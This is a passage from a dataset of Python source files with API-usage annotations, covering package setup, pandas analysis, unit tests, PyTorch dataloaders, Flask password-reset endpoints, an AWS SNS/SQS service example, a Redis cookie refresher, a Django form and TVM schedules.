dash_html_components as html\\n')]"}}},{"rowIdx":749,"cells":{"code":{"kind":"string","value":"# Copyright 2021 Northern.tech AS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport setuptools\nimport re\n\nVERSIONFILE = \"src/mender/_version.py\"\nversion_string_line = open(VERSIONFILE, \"rt\").read()\nVSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\nmatch = re.search(VSRE, version_string_line, re.M)\nif match:\n version_string = match.group(1)\nelse:\n raise RuntimeError(\"Unable to find version string in %s.\" % (VERSIONFILE,))\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"mender-python-client-mendersoftware\",\n version=version_string,\n license=\"Apache 2.0\",\n author=\"Mendersoftware\",\n author_email=\"\",\n description=\"A Python implementation of the Mender client interface\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mendersoftware/mender-python-client\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\",\n ],\n keywords=[\"mender\", \"OTA\", \"updater\"],\n packages=setuptools.find_packages(where=\"src\"),\n install_requires=[\"cryptography\", \"requests\", \"msgpack\", \"websockets\"],\n entry_points={\"console_scripts\": [\"mender-python-client=mender.mender:main\"]},\n package_dir={\"\": \"src\"},\n python_requires=\">=3.6\",\n zip_safe=False,\n include_package_data=True,\n)\n"},"apis":{"kind":"list like","value":["setuptools.find_packages","re.search"],"string":"[\n \"setuptools.find_packages\",\n \"re.search\"\n]"},"extract_api":{"kind":"string","value":"[((781, 823), 're.search', 're.search', (['VSRE', 'version_string_line', 're.M'], {}), '(VSRE, version_string_line, re.M)\\n', (790, 823), False, 'import re\\n'), ((1687, 1724), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'where': '\"\"\"src\"\"\"'}), \"(where='src')\\n\", (1711, 1724), False, 'import setuptools\\n')]"}}},{"rowIdx":750,"cells":{"code":{"kind":"string","value":"# --------------\n# Importing header files\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy.stats import mode \r\n\r\n\r\n\r\n\r\n# code starts here\r\nbank = pd.read_csv(path)\r\ncategorical_var = bank.select_dtypes(include = 'object')\r\nprint(categorical_var)\r\nnumerical_var = bank.select_dtypes(include = 'number')\r\nprint(numerical_var)\r\n\r\n\r\nbanks = bank.drop(columns=['Loan_ID'])\r\nbank_mode = banks.mode()\r\nbanks = banks.fillna(bank_mode.iloc[0])\r\nprint(banks.isnull().sum())\r\n\r\navg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'], values='LoanAmount', aggfunc = 'mean')\r\nprint(avg_loan_amount)\r\n\r\nloan_approved_se = banks[ (banks['Self_Employed'] == \"Yes\") & (banks['Loan_Status'] == \"Y\") ]\r\nloan_approved_nse = banks[ (banks['Self_Employed'] == \"No\") & (banks['Loan_Status'] == \"Y\") 
]\r\n\r\npercentage_se = (len(loan_approved_se) / 614) * 100\r\npercentage_nse = (len(loan_approved_nse) / 614) * 100\r\n\r\n# loan amount term \r\n\r\nloan_term = banks['Loan_Amount_Term'].apply(lambda x: int(x)/12 )\r\n\r\n\r\nbig_loan_term=len(loan_term[loan_term>=25])\r\n\r\nprint(big_loan_term)\r\n\r\n\r\ncolumns_to_show = ['ApplicantIncome', 'Credit_History']\r\n\r\nloan_groupby=banks.groupby(['Loan_Status'])[columns_to_show]\r\n\r\n# Check the mean value \r\nmean_values=loan_groupby.agg([np.mean])\r\n\r\nprint(mean_values)\r\n\r\n# code ends here\r\n\n\n\n"},"apis":{"kind":"list like","value":["pandas.pivot_table","pandas.read_csv"],"string":"[\n \"pandas.pivot_table\",\n \"pandas.read_csv\"\n]"},"extract_api":{"kind":"string","value":"[((150, 167), 'pandas.read_csv', 'pd.read_csv', (['path'], {}), '(path)\\n', (161, 167), True, 'import pandas as pd\\n'), ((489, 598), 'pandas.pivot_table', 'pd.pivot_table', (['banks'], {'index': \"['Gender', 'Married', 'Self_Employed']\", 'values': '\"\"\"LoanAmount\"\"\"', 'aggfunc': '\"\"\"mean\"\"\"'}), \"(banks, index=['Gender', 'Married', 'Self_Employed'], values=\\n 'LoanAmount', aggfunc='mean')\\n\", (503, 598), True, 'import pandas as pd\\n')]"}}},{"rowIdx":751,"cells":{"code":{"kind":"string","value":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom easy2fa import cli\n\n\nclass TestCheckInput(TestCase):\n @patch('builtins.input')\n def test_default(self, mock_input):\n mock_input.return_value = ''\n self.assertEquals(cli.check_input('prompt', default='one'), 'one')\n mock_input.return_value = 'two'\n self.assertEquals(cli.check_input('prompt', default='one'), 'two')\n\n @patch('builtins.input')\n @patch('builtins.print')\n def test_assertions(self, mock_print, mock_input):\n def assertion(value):\n if value not in ['yes', 'no']:\n return 'use yes or no'\n\n mock_input.side_effect = ['input', '', 'no']\n self.assertEquals(cli.check_input('prompt', assertion=assertion),\n 'no')\n mock_print.assert_called_with('\\tInvalid input: use yes or no')\n"},"apis":{"kind":"list like","value":["easy2fa.cli.check_input","unittest.mock.patch"],"string":"[\n \"easy2fa.cli.check_input\",\n \"unittest.mock.patch\"\n]"},"extract_api":{"kind":"string","value":"[((126, 149), 'unittest.mock.patch', 'patch', (['\"\"\"builtins.input\"\"\"'], {}), \"('builtins.input')\\n\", (131, 149), False, 'from unittest.mock import patch\\n'), ((423, 446), 'unittest.mock.patch', 'patch', (['\"\"\"builtins.input\"\"\"'], {}), \"('builtins.input')\\n\", (428, 446), False, 'from unittest.mock import patch\\n'), ((452, 475), 'unittest.mock.patch', 'patch', (['\"\"\"builtins.print\"\"\"'], {}), \"('builtins.print')\\n\", (457, 475), False, 'from unittest.mock import patch\\n'), ((253, 293), 'easy2fa.cli.check_input', 'cli.check_input', (['\"\"\"prompt\"\"\"'], {'default': '\"\"\"one\"\"\"'}), \"('prompt', default='one')\\n\", (268, 293), False, 'from easy2fa import cli\\n'), ((368, 408), 'easy2fa.cli.check_input', 'cli.check_input', (['\"\"\"prompt\"\"\"'], {'default': '\"\"\"one\"\"\"'}), \"('prompt', default='one')\\n\", (383, 408), False, 'from easy2fa import cli\\n'), ((723, 769), 'easy2fa.cli.check_input', 'cli.check_input', (['\"\"\"prompt\"\"\"'], {'assertion': 'assertion'}), \"('prompt', assertion=assertion)\\n\", (738, 769), False, 'from easy2fa import cli\\n')]"}}},{"rowIdx":752,"cells":{"code":{"kind":"string","value":"from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\r\n\r\nfrom bert_finetuning.data import 
GermanData\r\n\r\n\r\nclass GermanDataLoader:\r\n def __init__(\r\n self,\r\n data_paths,\r\n model_name,\r\n do_cleansing,\r\n max_sequence_length,\r\n batch_size=8,\r\n dataset_cls=GermanData,\r\n ):\r\n self.german_data = dataset_cls(\r\n data_paths,\r\n model_name,\r\n max_sequence_length=max_sequence_length,\r\n do_cleansing=do_cleansing,\r\n )\r\n self.batch_size = batch_size\r\n self.create_loaders()\r\n\r\n def create_loaders(self):\r\n \"\"\"\r\n Create Torch dataloaders for data splits\r\n \"\"\"\r\n self.german_data.text_to_tensors()\r\n print(\"creating dataloaders\")\r\n train_data = TensorDataset(\r\n self.german_data.train_inputs,\r\n self.german_data.train_masks,\r\n self.german_data.train_labels,\r\n )\r\n train_sampler = RandomSampler(train_data)\r\n self.train_dataloader = DataLoader(\r\n train_data, sampler=train_sampler, batch_size=self.batch_size\r\n )\r\n\r\n validation_data = TensorDataset(\r\n self.german_data.validation_inputs,\r\n self.german_data.validation_masks,\r\n self.german_data.validation_labels,\r\n )\r\n validation_sampler = SequentialSampler(validation_data)\r\n self.validation_dataloader = DataLoader(\r\n validation_data, sampler=validation_sampler, batch_size=self.batch_size\r\n )\r\n\r\n test_data = TensorDataset(\r\n self.german_data.test_inputs,\r\n self.german_data.test_masks,\r\n self.german_data.test_labels,\r\n )\r\n test_sampler = SequentialSampler(test_data)\r\n self.test_dataloader = DataLoader(\r\n test_data, sampler=test_sampler, batch_size=self.batch_size\r\n )\r\n print(\"finished creating dataloaders\")\r\n\r\n\r\n\"\"\"\r\n** FOR DEBUGGING **\r\n\r\nif __name__ == \"__main__\":\r\n ## define data paths\r\n germeval_data_paths = {\r\n \"train\": \"./datasets/hasoc_dataset/hasoc_german_train.csv\",\r\n \"dev\": \"./datasets/hasoc_dataset/hasoc_german_validation.csv\",\r\n \"test\": \"./datasets/hasoc_dataset/hasoc_german_test.csv\",\r\n }\r\n\r\n hasoc_german_data_paths = {\r\n \"train\": \"./datasets/hasoc_dataset/hasoc_german_train.csv\",\r\n \"dev\": \"./datasets/hasoc_dataset/hasoc_german_validation.csv\",\r\n \"test\": \"./datasets/hasoc_dataset/hasoc_german_test.csv\",\r\n }\r\n\r\n ## create dataloaders\r\n\r\n print(\"creating germeval dataloaders...\")\r\n germ_eval_dataloader = GermanDataLoader(germeval_data_paths)\r\n\r\n print(\"creating hasoc dataloaders...\")\r\n hasoc_german_dataloader = GermanDataLoader(hasoc_german_data_paths)\r\n\r\n\"\"\"\r\n"},"apis":{"kind":"list like","value":["torch.utils.data.RandomSampler","torch.utils.data.SequentialSampler","torch.utils.data.TensorDataset","torch.utils.data.DataLoader"],"string":"[\n \"torch.utils.data.RandomSampler\",\n \"torch.utils.data.SequentialSampler\",\n \"torch.utils.data.TensorDataset\",\n \"torch.utils.data.DataLoader\"\n]"},"extract_api":{"kind":"string","value":"[((837, 946), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.train_inputs', 'self.german_data.train_masks', 'self.german_data.train_labels'], {}), '(self.german_data.train_inputs, self.german_data.train_masks,\\n self.german_data.train_labels)\\n', (850, 946), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1019, 1044), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_data'], {}), '(train_data)\\n', (1032, 1044), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1078, 1151), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'sampler': 
'train_sampler', 'batch_size': 'self.batch_size'}), '(train_data, sampler=train_sampler, batch_size=self.batch_size)\\n', (1088, 1151), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1205, 1330), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.validation_inputs', 'self.german_data.validation_masks', 'self.german_data.validation_labels'], {}), '(self.german_data.validation_inputs, self.german_data.\\n validation_masks, self.german_data.validation_labels)\\n', (1218, 1330), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1407, 1441), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['validation_data'], {}), '(validation_data)\\n', (1424, 1441), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1480, 1568), 'torch.utils.data.DataLoader', 'DataLoader', (['validation_data'], {'sampler': 'validation_sampler', 'batch_size': 'self.batch_size'}), '(validation_data, sampler=validation_sampler, batch_size=self.\\n batch_size)\\n', (1490, 1568), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1611, 1717), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.test_inputs', 'self.german_data.test_masks', 'self.german_data.test_labels'], {}), '(self.german_data.test_inputs, self.german_data.test_masks,\\n self.german_data.test_labels)\\n', (1624, 1717), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1789, 1817), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['test_data'], {}), '(test_data)\\n', (1806, 1817), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n'), ((1850, 1921), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'sampler': 'test_sampler', 'batch_size': 'self.batch_size'}), '(test_data, sampler=test_sampler, batch_size=self.batch_size)\\n', (1860, 1921), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\\n')]"}}},{"rowIdx":753,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\nimport logging\nimport datetime\n\nfrom flask import request, render_template\nfrom flask_jwt_extended import (\n create_access_token,\n decode_token\n)\nfrom jwt.exceptions import DecodeError\nfrom flasgger import swag_from\nfrom http import HTTPStatus\nfrom pathlib import Path\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom vantage6.common import logger_name\nfrom vantage6.server import db\nfrom vantage6.server.resource import (\n ServicesResources\n)\n\nmodule_name = logger_name(__name__)\nlog = logging.getLogger(module_name)\n\n\ndef setup(api, api_base, services):\n\n path = \"/\".join([api_base, module_name])\n log.info(f'Setting up \"{path}\" and subdirectories')\n\n api.add_resource(\n ResetPassword,\n path+'/reset',\n endpoint=\"reset_password\",\n methods=('POST',),\n resource_class_kwargs=services\n )\n\n api.add_resource(\n RecoverPassword,\n path+'/lost',\n endpoint='recover_password',\n methods=('POST',),\n resource_class_kwargs=services\n )\n\n\n# ------------------------------------------------------------------------------\n# Resources / API's\n# ------------------------------------------------------------------------------\nclass ResetPassword(ServicesResources):\n \"\"\"user can use recover token to reset their password.\"\"\"\n\n 
@swag_from(str(Path(r\"swagger/post_reset_password.yaml\")),\n endpoint='reset_password')\n def post(self):\n \"\"\"\"submit email-adress receive token.\"\"\"\n\n # retrieve user based on email or username\n body = request.get_json()\n reset_token = body.get(\"reset_token\")\n password = body.get(\"password\")\n\n if not reset_token or not password:\n return {\"msg\": \"reset token and/or password is missing!\"}, \\\n HTTPStatus.BAD_REQUEST\n\n # obtain user\n try:\n user_id = decode_token(reset_token)['identity'].get('id')\n except DecodeError:\n return {\"msg\": \"Invalid recovery token!\"}, HTTPStatus.BAD_REQUEST\n\n log.debug(user_id)\n user = db.User.get(user_id)\n\n # set password\n user.set_password(password)\n user.save()\n\n log.info(f\"Successfull password reset for '{user.username}'\")\n return {\"msg\": \"password successfully been reset!\"}, \\\n HTTPStatus.OK\n\n\nclass RecoverPassword(ServicesResources):\n \"\"\"send a mail containing a recover token\"\"\"\n\n @swag_from(str(Path(r\"swagger/post_recover_password.yaml\")),\n endpoint='recover_password')\n def post(self):\n \"\"\"username or email generates a token which is mailed.\"\"\"\n\n # default return string\n ret = {\"msg\": \"If the username or email is our database you \"\n \"will soon receive an email\"}\n\n # obtain username/email from request'\n body = request.get_json()\n username = body.get(\"username\")\n email = body.get(\"email\")\n if not (email or username):\n return {\"msg\": \"No username or email provided!\"}, \\\n HTTPStatus.BAD_REQUEST\n\n # find user in the database, if not here we stop!\n try:\n if username:\n user = db.User.get_by_username(username)\n else:\n user = db.User.get_by_email(email)\n except NoResultFound:\n # we do not tell them.... But we won't continue either\n return ret\n\n log.info(f\"Password reset requested for '{user.username}'\")\n\n # generate a token that can reset their password\n expires = datetime.timedelta(hours=1)\n reset_token = create_access_token(\n {\"id\": str(user.id)}, expires_delta=expires\n )\n\n self.mail.send_email(\n \"password reset\",\n sender=\"\",\n recipients=[user.email],\n text_body=render_template(\"mail/reset_password_token.txt\",\n token=reset_token),\n html_body=render_template(\"mail/reset_password_token.html\",\n token=reset_token)\n )\n\n return ret\n"},"apis":{"kind":"list like","value":["logging.getLogger","flask.render_template","vantage6.server.db.User.get","vantage6.server.db.User.get_by_email","pathlib.Path","vantage6.server.db.User.get_by_username","flask_jwt_extended.decode_token","flask.request.get_json","vantage6.common.logger_name","datetime.timedelta"],"string":"[\n \"logging.getLogger\",\n \"flask.render_template\",\n \"vantage6.server.db.User.get\",\n \"vantage6.server.db.User.get_by_email\",\n \"pathlib.Path\",\n \"vantage6.server.db.User.get_by_username\",\n \"flask_jwt_extended.decode_token\",\n \"flask.request.get_json\",\n \"vantage6.common.logger_name\",\n \"datetime.timedelta\"\n]"},"extract_api":{"kind":"string","value":"[((494, 515), 'vantage6.common.logger_name', 'logger_name', (['__name__'], {}), '(__name__)\\n', (505, 515), False, 'from vantage6.common import logger_name\\n'), ((522, 552), 'logging.getLogger', 'logging.getLogger', (['module_name'], {}), '(module_name)\\n', (539, 552), False, 'import logging\\n'), ((1577, 1595), 'flask.request.get_json', 'request.get_json', ([], {}), '()\\n', (1593, 1595), False, 'from flask import request, render_template\\n'), ((2094, 2114), 'vantage6.server.db.User.get', 'db.User.get', 
(['user_id'], {}), '(user_id)\\n', (2105, 2114), False, 'from vantage6.server import db\\n'), ((2862, 2880), 'flask.request.get_json', 'request.get_json', ([], {}), '()\\n', (2878, 2880), False, 'from flask import request, render_template\\n'), ((3582, 3609), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\\n', (3600, 3609), False, 'import datetime\\n'), ((1354, 1394), 'pathlib.Path', 'Path', (['\"\"\"swagger/post_reset_password.yaml\"\"\"'], {}), \"('swagger/post_reset_password.yaml')\\n\", (1358, 1394), False, 'from pathlib import Path\\n'), ((2468, 2510), 'pathlib.Path', 'Path', (['\"\"\"swagger/post_recover_password.yaml\"\"\"'], {}), \"('swagger/post_recover_password.yaml')\\n\", (2472, 2510), False, 'from pathlib import Path\\n'), ((3214, 3247), 'vantage6.server.db.User.get_by_username', 'db.User.get_by_username', (['username'], {}), '(username)\\n', (3237, 3247), False, 'from vantage6.server import db\\n'), ((3289, 3316), 'vantage6.server.db.User.get_by_email', 'db.User.get_by_email', (['email'], {}), '(email)\\n', (3309, 3316), False, 'from vantage6.server import db\\n'), ((3869, 3936), 'flask.render_template', 'render_template', (['\"\"\"mail/reset_password_token.txt\"\"\"'], {'token': 'reset_token'}), \"('mail/reset_password_token.txt', token=reset_token)\\n\", (3884, 3936), False, 'from flask import request, render_template\\n'), ((3998, 4066), 'flask.render_template', 'render_template', (['\"\"\"mail/reset_password_token.html\"\"\"'], {'token': 'reset_token'}), \"('mail/reset_password_token.html', token=reset_token)\\n\", (4013, 4066), False, 'from flask import request, render_template\\n'), ((1897, 1922), 'flask_jwt_extended.decode_token', 'decode_token', (['reset_token'], {}), '(reset_token)\\n', (1909, 1922), False, 'from flask_jwt_extended import create_access_token, decode_token\\n')]"}}},{"rowIdx":754,"cells":{"code":{"kind":"string","value":"import os\nfrom typing import Any, Callable, Dict\n\nimport tomodachi\nfrom tomodachi import aws_sns_sqs, aws_sns_sqs_publish\nfrom tomodachi.discovery import AWSSNSRegistration\nfrom tomodachi.envelope import JsonBase\n\n\nasync def middleware_function(\n func: Callable, service: Any, message: Any, topic: str, context: Dict, *args: Any, **kwargs: Any\n) -> Any:\n # Functionality before function is called\n service.log(\"middleware before\")\n\n return_value = await func(*args, **kwargs)\n\n # There's also the possibility to pass in extra arguments or keywords arguments, for example:\n # return_value = await func(*args, id='overridden', **kwargs)\n\n # Functinoality after function is called\n service.log(\"middleware after\")\n\n return return_value\n\n\nclass ExampleAWSSNSSQSService(tomodachi.Service):\n name = \"example-aws-sns-sqs-service\"\n log_level = \"INFO\"\n uuid = str(os.environ.get(\"SERVICE_UUID\") or \"\")\n\n # Build own \"discovery\" functions, to be run on start and stop\n # See tomodachi/discovery/aws_sns_registration.py for example\n discovery = [AWSSNSRegistration]\n\n # The message envelope class defines how a message should be processed when sent and received\n # See tomodachi/envelope/json_base.py for a basic example using JSON and transferring some metadata\n message_envelope = JsonBase\n\n # Adds a middleware function that is run on every incoming message.\n # Several middlewares can be chained.\n message_middleware = [middleware_function]\n\n # Some options can be specified to define credentials, used ports, hostnames, access log, etc.\n options = {\n \"aws_sns_sqs\": {\n 
\"region_name\": None, # specify AWS region (example: 'eu-west-1')\n \"aws_access_key_id\": None, # specify AWS access key (example: '')\n \"aws_secret_access_key\": None, # specify AWS secret key (example: 'f7sha92hNotarealsecretkeyn29ShnSYQi3nzgA')\n },\n \"aws_endpoint_urls\": {\n \"sns\": None, # For example 'http://localhost:4575' if localstack is used for testing\n \"sqs\": None, # For example 'http://localhost:4576' if localstack is used for testing\n },\n }\n\n @aws_sns_sqs(\"example-route1\")\n async def route1a(self, data: Any) -> None:\n self.log('Received data (function: route1a) - \"{}\"'.format(data))\n\n async def _started_service(self) -> None:\n async def publish(data: Any, topic: str) -> None:\n self.log('Publish data \"{}\"'.format(data))\n await aws_sns_sqs_publish(self, data, topic=topic, wait=False)\n\n await publish(\"友達\", \"example-route1\")\n"},"apis":{"kind":"list like","value":["tomodachi.aws_sns_sqs_publish","os.environ.get","tomodachi.aws_sns_sqs"],"string":"[\n \"tomodachi.aws_sns_sqs_publish\",\n \"os.environ.get\",\n \"tomodachi.aws_sns_sqs\"\n]"},"extract_api":{"kind":"string","value":"[((2184, 2213), 'tomodachi.aws_sns_sqs', 'aws_sns_sqs', (['\"\"\"example-route1\"\"\"'], {}), \"('example-route1')\\n\", (2195, 2213), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\\n'), ((891, 921), 'os.environ.get', 'os.environ.get', (['\"\"\"SERVICE_UUID\"\"\"'], {}), \"('SERVICE_UUID')\\n\", (905, 921), False, 'import os\\n'), ((2514, 2570), 'tomodachi.aws_sns_sqs_publish', 'aws_sns_sqs_publish', (['self', 'data'], {'topic': 'topic', 'wait': '(False)'}), '(self, data, topic=topic, wait=False)\\n', (2533, 2570), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\\n')]"}}},{"rowIdx":755,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n# @Author: GXR\n# @CreateTime: 2022-01-20\n# @UpdateTime: 2022-01-20\n\nimport redis\n\nimport config\nimport cookie_login\nfrom cookie_api import app\n\nred = redis.Redis(\n host=config.REDIS_HOST,\n port=config.REDIS_PORT,\n db=config.REDIS_DB,\n decode_responses=True,\n)\n\n\n# 刷新cookie数量\ndef cookie_refresh():\n while 1:\n cookie_list = red.smembers(config.REDIS_KEY_COOKIE)\n if len(cookie_list) >= config.COOKIE_COUNT:\n break\n cookie_login.run_cookie_login(1)\n app.logger.info(\"[cookie数量正常]-[%s]\" % len(cookie_list))\n\n\ndef run_cookie_refresh():\n cookie_refresh()\n\n\nif __name__ == \"__main__\":\n run_cookie_refresh()\n"},"apis":{"kind":"list like","value":["cookie_login.run_cookie_login","redis.Redis"],"string":"[\n \"cookie_login.run_cookie_login\",\n \"redis.Redis\"\n]"},"extract_api":{"kind":"string","value":"[((174, 281), 'redis.Redis', 'redis.Redis', ([], {'host': 'config.REDIS_HOST', 'port': 'config.REDIS_PORT', 'db': 'config.REDIS_DB', 'decode_responses': '(True)'}), '(host=config.REDIS_HOST, port=config.REDIS_PORT, db=config.\\n REDIS_DB, decode_responses=True)\\n', (185, 281), False, 'import redis\\n'), ((484, 516), 'cookie_login.run_cookie_login', 'cookie_login.run_cookie_login', (['(1)'], {}), '(1)\\n', (513, 516), False, 'import cookie_login\\n')]"}}},{"rowIdx":756,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n# start tutorial\nfrom django.db import models\nfrom djng.forms import NgModelFormMixin, NgFormValidationMixin\nfrom djng.styling.bootstrap3.forms import Bootstrap3ModelForm\n\n\nclass SubscribeUser(models.Model):\n full_name = models.CharField(\n \"\",\n max_length=99)\n\n avatar = 
models.ImageField(\"Avatar\", blank=False, null=True)\n\n permit = models.FileField(\"Permit\", blank=True, null=True)\n\n\nclass SubscribeForm(NgModelFormMixin, NgFormValidationMixin, Bootstrap3ModelForm):\n use_required_attribute = False\n scope_prefix = 'subscribe_data'\n form_name = 'my_form'\n\n class Meta:\n model = SubscribeUser\n fields = ['full_name', 'avatar', 'permit']\n"},"apis":{"kind":"list like","value":["django.db.models.ImageField","django.db.models.FileField","django.db.models.CharField"],"string":"[\n \"django.db.models.ImageField\",\n \"django.db.models.FileField\",\n \"django.db.models.CharField\"\n]"},"extract_api":{"kind":"string","value":"[((288, 329), 'django.db.models.CharField', 'models.CharField', (['\"\"\"\"\"\"'], {'max_length': '(99)'}), \"('', max_length=99)\\n\", (304, 329), False, 'from django.db import models\\n'), ((361, 412), 'django.db.models.ImageField', 'models.ImageField', (['\"\"\"Avatar\"\"\"'], {'blank': '(False)', 'null': '(True)'}), \"('Avatar', blank=False, null=True)\\n\", (378, 412), False, 'from django.db import models\\n'), ((427, 476), 'django.db.models.FileField', 'models.FileField', (['\"\"\"Permit\"\"\"'], {'blank': '(True)', 'null': '(True)'}), \"('Permit', blank=True, null=True)\\n\", (443, 476), False, 'from django.db import models\\n')]"}}},{"rowIdx":757,"cells":{"code":{"kind":"string","value":"# Licensed to the Apache Software Foundation (ASF) under one\r\n# or more contributor license agreements. See the NOTICE file\r\n# distributed with this work for additional information\r\n# regarding copyright ownership. The ASF licenses this file\r\n# to you under the Apache License, Version 2.0 (the\r\n# \"License\"); you may not use this file except in compliance\r\n# with the License. You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing,\r\n# software distributed under the License is distributed on an\r\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n# KIND, either express or implied. 
See the License for the\r\n# specific language governing permissions and limitations\r\n# under the License.\r\n# pylint: disable=invalid-name\r\n\r\n\"\"\"Compute and schedule for add, multiply, subtract slice op\r\n\r\nPlease note the following assumptions made by the implementation:\r\n\r\n1) The inputs will be multiple of crouton layout except for the axis that needs broadcasting.\"\"\"\r\n\r\nfrom tvm import te\r\nfrom tvm import tir\r\nfrom tvm import topi\r\nfrom ..utils import get_layout_transform_fn\r\n\r\n\r\ndef add_broadcast_compute(input_a, input_b):\r\n \"\"\"Call the add op from topi\"\"\"\r\n return topi.add(input_a, input_b)\r\n\r\n\r\ndef subtract_broadcast_compute(input_a, input_b):\r\n \"\"\"Call the subtract op from topi\"\"\"\r\n return topi.subtract(input_a, input_b)\r\n\r\n\r\ndef multiply_broadcast_compute(input_a, input_b):\r\n \"\"\"Call the multiply op from topi\"\"\"\r\n return topi.multiply(input_a, input_b)\r\n\r\n\r\ndef tir_broadcast_schedule(\r\n out_m,\r\n input_a,\r\n input_b,\r\n output_layout: str,\r\n input_a_layout: str,\r\n input_b_layout: str,\r\n op_name: str,\r\n):\r\n \"\"\"Schedule for input and output layout nhwc-8h2w32c2w-2d considering broadcast\"\"\"\r\n func = te.create_prim_func([input_a, input_b, out_m])\r\n\r\n s = tir.Schedule(func)\r\n\r\n block_dict = {\"add\": \"T_add\", \"subtract\": \"T_subtract\", \"multiply\": \"T_multiply\"}\r\n\r\n block = s.get_block(block_dict[op_name])\r\n\r\n if input_a_layout == \"nhwc-8h2w32c2w-2d\":\r\n input_a_transformed_layout = get_layout_transform_fn(input_a_layout)\r\n s.transform_layout(block, buffer=(\"read\", 0), index_map=input_a_transformed_layout)\r\n\r\n if input_b_layout == \"nhwc-8h2w32c2w-2d\":\r\n input_b_transformed_layout = get_layout_transform_fn(input_b_layout)\r\n s.transform_layout(block, buffer=(\"read\", 1), index_map=input_b_transformed_layout)\r\n\r\n output_transformed_layout = get_layout_transform_fn(output_layout)\r\n s.transform_layout(block, buffer=(\"write\", 0), index_map=output_transformed_layout)\r\n\r\n n, h, w, c = s.get_loops(block)\r\n\r\n h_o, h_i = s.split(h, [None, 8])\r\n w_o, w_i = s.split(w, [None, 4])\r\n c_o, c_i = s.split(c, [None, 32])\r\n wio, wii = s.split(w_i, [None, 2])\r\n\r\n s.reorder(n, h_o, w_o, c_o, h_i, wio, c_i, wii)\r\n\r\n fused = s.fuse(c_i, wii)\r\n s.vectorize(fused)\r\n\r\n return s\r\n"},"apis":{"kind":"list like","value":["tvm.topi.add","tvm.tir.Schedule","tvm.te.create_prim_func","tvm.topi.subtract","tvm.topi.multiply"],"string":"[\n \"tvm.topi.add\",\n \"tvm.tir.Schedule\",\n \"tvm.te.create_prim_func\",\n \"tvm.topi.subtract\",\n \"tvm.topi.multiply\"\n]"},"extract_api":{"kind":"string","value":"[((1274, 1300), 'tvm.topi.add', 'topi.add', (['input_a', 'input_b'], {}), '(input_a, input_b)\\n', (1282, 1300), False, 'from tvm import topi\\n'), ((1410, 1441), 'tvm.topi.subtract', 'topi.subtract', (['input_a', 'input_b'], {}), '(input_a, input_b)\\n', (1423, 1441), False, 'from tvm import topi\\n'), ((1551, 1582), 'tvm.topi.multiply', 'topi.multiply', (['input_a', 'input_b'], {}), '(input_a, input_b)\\n', (1564, 1582), False, 'from tvm import topi\\n'), ((1856, 1902), 'tvm.te.create_prim_func', 'te.create_prim_func', (['[input_a, input_b, out_m]'], {}), '([input_a, input_b, out_m])\\n', (1875, 1902), False, 'from tvm import te\\n'), ((1914, 1932), 'tvm.tir.Schedule', 'tir.Schedule', (['func'], {}), '(func)\\n', (1926, 1932), False, 'from tvm import tir\\n')]"}}},{"rowIdx":758,"cells":{"code":{"kind":"string","value":"# Copyright (c) 
